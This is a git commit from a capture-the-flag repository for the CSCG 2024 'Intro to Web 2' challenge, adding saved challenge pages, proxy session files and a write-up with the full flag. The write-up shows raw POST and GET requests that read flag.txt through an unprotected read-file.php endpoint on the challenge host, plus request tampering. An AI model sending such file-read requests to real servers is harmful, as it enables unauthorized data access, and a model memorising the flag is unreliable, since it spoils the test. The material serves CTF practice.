changed repo structure
This commit is contained in:
6
2024/cscg/web/intro_web_2/intro_web_2_session.session
Normal file
6
2024/cscg/web/intro_web_2/intro_web_2_session.session
Normal file
@@ -0,0 +1,6 @@
|
||||
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
|
||||
<session>
|
||||
<sessionId>1709346750724</sessionId>
|
||||
<sessionName>Untitled Session</sessionName>
|
||||
<sessionDesc/>
|
||||
</session>
|
||||
BIN
2024/cscg/web/intro_web_2/intro_web_2_session.session.data
Normal file
BIN
2024/cscg/web/intro_web_2/intro_web_2_session.session.data
Normal file
Binary file not shown.
BIN
2024/cscg/web/intro_web_2/intro_web_2_session.session.lobs
Normal file
BIN
2024/cscg/web/intro_web_2/intro_web_2_session.session.lobs
Normal file
Binary file not shown.
@@ -0,0 +1,5 @@
|
||||
#HSQL Database Engine 2.7.2
|
||||
#Sat Mar 02 04:14:43 CET 2024
|
||||
tx_timestamp=61202
|
||||
modified=no
|
||||
version=2.7.2
|
||||
2144
2024/cscg/web/intro_web_2/intro_web_2_session.session.script
Normal file
2144
2024/cscg/web/intro_web_2/intro_web_2_session.session.script
Normal file
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,19 @@
|
||||
<html>
|
||||
<head>
|
||||
<title>Intro to Web 2</title>
|
||||
<meta charset="UTF-8">
|
||||
<link rel="stylesheet" type="text/css" href="style.css" />
|
||||
</head>
|
||||
<body>
|
||||
<h1>Burn After Reading</h1>
|
||||
This page automatically retrieves confidential information.
|
||||
To protect against unauthorized use, the backend server will irreversibly nuke all of our data in
|
||||
case this page is accessed by someone that failed to pass our
|
||||
<em>Military-Grade Security Gate™</em>.
|
||||
<h3>Status of flag document:
|
||||
<span style="color:green">INTACT</span></h3>
|
||||
<hr>
|
||||
<pre>
|
||||
Flag part 4/4: W4at6R2B}</pre>
|
||||
</body>
|
||||
</html>
|
||||
@@ -0,0 +1,16 @@
|
||||
<html>
|
||||
<head>
|
||||
<title>Intro to Web 2</title>
|
||||
<meta charset="UTF-8">
|
||||
<link rel="stylesheet" type="text/css" href="style.css" />
|
||||
</head>
|
||||
<body>
|
||||
<h1>Statistics Console (POST version)</h1>
|
||||
<h3>File Name:
|
||||
<span style="font-family: 'Courier New', monospace;">flag.txt</span></h3>
|
||||
<hr>
|
||||
<pre>
|
||||
Flag part 2/4: UaT0BVvk</pre>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
@@ -0,0 +1,16 @@
|
||||
<html>
|
||||
<head>
|
||||
<title>Intro to Web 2</title>
|
||||
<meta charset="UTF-8">
|
||||
<link rel="stylesheet" type="text/css" href="style.css" />
|
||||
</head>
|
||||
<body>
|
||||
<h1>Statistics Console (GET version)</h1>
|
||||
<h3>File Name:
|
||||
<span style="font-family: 'Courier New', monospace;">flag.txt</span></h3>
|
||||
<hr>
|
||||
<pre>
|
||||
Flag part 3/4: Q9Z39J9A</pre>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
52
2024/cscg/web/intro_web_2/leaked_sites/train.html
Normal file
52
2024/cscg/web/intro_web_2/leaked_sites/train.html
Normal file
@@ -0,0 +1,52 @@
|
||||
<html>
|
||||
<head>
|
||||
<title>Intro to Web 2</title>
|
||||
<meta charset="UTF-8">
|
||||
<link rel="stylesheet" type="text/css" href="style.css" />
|
||||
</head>
|
||||
<body>
|
||||
<h1>$(GERMAN_CITY) Tram Ticket Machine</h1>
|
||||
|
||||
<h3>Get your <span style="text-decoration: line-through;">ticket</span> flag here!</h3>
|
||||
<hr>
|
||||
With the help of our state-of-the-art floppy disk switching robots, you can now read the first
|
||||
part of the flag in real time!
|
||||
<p>
|
||||
Flag part 1/4: <span style="color: green; font-family: 'Courier New', monospace;">
|
||||
CSCG{<span id="flag">........</span></span>
|
||||
|
||||
<!--
|
||||
No time to wait, right?
|
||||
-->
|
||||
|
||||
<script>
|
||||
flag = "l9jj550K"
|
||||
symbolsRevealed = 0
|
||||
waitTime = 1000;
|
||||
|
||||
function nextSymbol() {
|
||||
if (symbolsRevealed >= flag.length) return;
|
||||
symbolsRevealed++;
|
||||
|
||||
waitTime *= 2;
|
||||
setTimeout(nextSymbol, waitTime);
|
||||
}
|
||||
|
||||
function spin() {
|
||||
const flagPart = flag.substr(0, symbolsRevealed);
|
||||
const alphabet = ("ABCDEFGHIJKLMNOPRSTUVWXYZabcdefhiklmnorstuvwxz0123456789")
|
||||
const randomSymbol =
|
||||
symbolsRevealed < flag.length
|
||||
? alphabet.charAt(Math.floor(Math.random() * alphabet.length))
|
||||
: "";
|
||||
const suffix = ".".repeat(Math.max(0, flag.length - 1 - symbolsRevealed));
|
||||
|
||||
document.getElementById("flag").innerHTML = flagPart + randomSymbol + suffix;
|
||||
}
|
||||
|
||||
setTimeout(nextSymbol, waitTime);
|
||||
setInterval(spin, 50);
|
||||
</script>
|
||||
|
||||
</body>
|
||||
</html>
|
||||
57
2024/cscg/web/intro_web_2/notes.md
Normal file
57
2024/cscg/web/intro_web_2/notes.md
Normal file
@@ -0,0 +1,57 @@
|
||||
### 1.Part
|
||||
We can spoof our OS with the help of ZAP and get the site [train.html](leaked_sites/train.html)
|
||||
### 2. Part
|
||||
There is an unsecure statistics service which shows you the content of every file you specify. We can use this to get the content of flag.txt.
|
||||
Sending the following request:
|
||||
|
||||
```http
|
||||
POST https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php HTTP/1.1
|
||||
host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
content-length: 17
|
||||
Origin: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
|
||||
Connection: keep-alive
|
||||
Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Sec-Fetch-Dest: document
|
||||
Sec-Fetch-Mode: navigate
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-User: ?1
|
||||
|
||||
filename=flag.txt
|
||||
```
|
||||
|
||||
Yields the page [statistics_console.html](leaked_sites/statistics_console.html)
|
||||
|
||||
### 3. Part
|
||||
|
||||
A similar bug can be used with a GET request to get the content of the flag.txt file.
|
||||
This time we use a faulty php file called read-file.php
|
||||
|
||||
```http
|
||||
GET https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php?filename=flag.txt HTTP/1.1
|
||||
host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Connection: keep-alive
|
||||
Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Sec-Fetch-Dest: document
|
||||
Sec-Fetch-Mode: navigate
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-User: ?1
|
||||
content-length: 0
|
||||
```
|
||||
|
||||
Returns the page [statistics_console_get.html](leaked_sites/statistics_console_get.html)
|
||||
|
||||
### 4.Part
|
||||
We now have to intercept a request made and change the authority information.
|
||||
When we do this we get the fourth part of the flag.
|
||||
|
||||
### flag
|
||||
CSCG{l9jj550KUaT0BVvkQ9Z39J9AW4at6R2B}
|
||||
Reference in New Issue
Block a user